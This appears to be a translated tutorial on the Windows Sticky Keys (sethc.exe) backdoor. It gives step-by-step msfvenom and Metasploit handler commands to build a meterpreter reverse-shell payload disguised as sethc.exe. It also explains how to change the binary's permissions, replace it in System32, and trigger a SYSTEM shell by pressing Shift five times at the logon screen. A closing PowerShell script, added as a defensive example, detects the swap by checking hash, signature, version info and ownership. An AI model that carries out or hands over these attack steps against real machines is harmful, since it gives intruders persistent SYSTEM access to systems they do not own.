Operating system: Windows 7 Ultimate
Tool: msfconsole on Kali Linux
Principle of the "press Shift five times" privilege escalation
In Windows, pressing Shift five times triggers Sticky Keys, which is the program C:\Windows\System32\sethc.exe. If cmd.exe is renamed to sethc.exe and used to replace the original Sticky Keys binary, pressing Shift five times at the logon screen runs cmd.exe instead, and it runs with SYSTEM privileges.
Besides cmd.exe, other tools can also be used to replace sethc.exe.
Step 1: Use msfconsole on Kali to generate the Trojan
1. Start MSF
msfconsole
2. Use the exploit (handler) module
use exploit/multi/handler
3. Generate the Trojan. lhost is your own IP and lport is your own port; the payload connects back (reverse shell) to that IP and port.
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.18.128 lport=4444 -f exe -o sethc.exe
4. Because I opened the terminal on the desktop, the generated Trojan file is in the user's home directory; open another terminal to check the file location.
Step 2: Listen on the port and receive the reverse shell
1. Set the payload
set payload windows/meterpreter/reverse_tcp
2. Set the address the shell connects back to (your own IP)
set lhost 192.168.18.128
3. Set the port the shell connects back to
set lport 4444
4. Start listening
exploit
Step 3: Replace sethc.exe
Upload the generated Trojan to the C:\Windows\System32 directory on the target host and replace the original sethc.exe with it.
The original sethc.exe cannot be modified or deleted directly; its permissions must be changed first.
Step 4: Press Shift five times to trigger sethc.exe and receive the reverse shell
1. On the target host, press Shift five times to trigger sethc.exe. Nothing visible happens, because the program has been replaced.
2. Check the listener in Kali: type shell to get a command line on the target host and execute system commands.
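From the defender's side, the two swaps described above (sethc.exe replaced by a copy of cmd.exe, or by an msfvenom-generated executable) leave the accessibility binary looking nothing like the genuine Microsoft file. The following PowerShell check is an added example, not part of the original post; it assumes it is run as Administrator on the host being checked, with the standard System32 paths, and that the genuine file reports OriginalFilename "sethc.exe" and is owned by TrustedInstaller.

```powershell
# Added example (not from the original post): integrity check for sethc.exe.
# Assumes: run elevated on the host being checked; standard %SystemRoot% layout.
$sethc = Join-Path $env:SystemRoot 'System32\sethc.exe'
$cmd   = Join-Path $env:SystemRoot 'System32\cmd.exe'
$findings = @()

# 1. A cmd.exe swap: sethc.exe becomes byte-identical to cmd.exe.
$sethcHash = (Get-FileHash -Path $sethc -Algorithm SHA256).Hash
$cmdHash   = (Get-FileHash -Path $cmd   -Algorithm SHA256).Hash
if ($sethcHash -eq $cmdHash) {
    $findings += 'sethc.exe is byte-identical to cmd.exe (classic Sticky Keys swap)'
}

# 2. Version resource: the genuine file identifies itself as sethc.exe from Microsoft
#    (assumed values). A cmd.exe copy reports Cmd.Exe; a msfvenom-built exe carries
#    no meaningful version info.
$vi = (Get-Item -Path $sethc).VersionInfo
if ($vi.OriginalFilename -ne 'sethc.exe' -or $vi.CompanyName -notlike '*Microsoft*') {
    $findings += "Unexpected version info: OriginalFilename='$($vi.OriginalFilename)', CompanyName='$($vi.CompanyName)'"
}

# 3. Authenticode: the real binary is Microsoft-signed (catalog-signed on most builds);
#    a freshly generated payload is not signed at all. Older PowerShell releases report
#    catalog-signed files as NotSigned, so treat that as "inspect", not as proof.
$sig = Get-AuthenticodeSignature -FilePath $sethc
if ($sig.Status -ne 'Valid' -or $sig.SignerCertificate.Subject -notlike '*Microsoft*') {
    $findings += "Signature status '$($sig.Status)' (expected Valid with a Microsoft signer)"
}

# 4. Ownership: replacing the file requires changing its permissions first, so a
#    sethc.exe no longer owned by TrustedInstaller is itself a signal.
$owner = (Get-Acl -Path $sethc).Owner
if ($owner -ne 'NT SERVICE\TrustedInstaller') {
    $findings += "Owner is '$owner' (expected NT SERVICE\TrustedInstaller)"
}

if ($findings.Count -eq 0) {
    Write-Output "OK: $sethc looks like the genuine Microsoft binary (SHA256 $sethcHash)"
} else {
    Write-Output "ALERT: $sethc"
    $findings | ForEach-Object { Write-Output "  - $_" }
}
```

The same checks apply to the other accessibility binaries in System32 that can be abused the same way; running them from a scheduled task or a baseline comparison tool turns this into a continuous check rather than a one-off.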